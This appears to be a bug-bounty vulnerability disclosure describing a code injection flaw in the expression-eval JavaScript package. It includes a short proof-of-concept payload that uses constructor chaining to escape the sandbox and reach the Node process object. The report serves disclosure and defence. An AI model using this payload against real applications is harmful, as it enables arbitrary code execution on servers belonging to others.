Code Injection in donmccurdy/expression-eval


Reported on

Mar 25th 2021

✍️ Description

Althrough we have decleared in the README.MD that do not use this package with user-provided inputs, but after i exam some project with this project, i found that many developers still use in that way, which may lead to some serious security problem. So I think that we still need to do some basic thing to prevent some dangerous action in the package itself.

🕵️‍♂️ Proof of Concept

// PoC.js
const {compile} = require("expression-eval");
var payload = "(1).constructor.constructor('', 'return process')()"
console.log(compile(payload)()); // will return process

💥 Impact

Attackers can just use input as an payload without any prerequirement, and can execute any code they want.

to join this conversation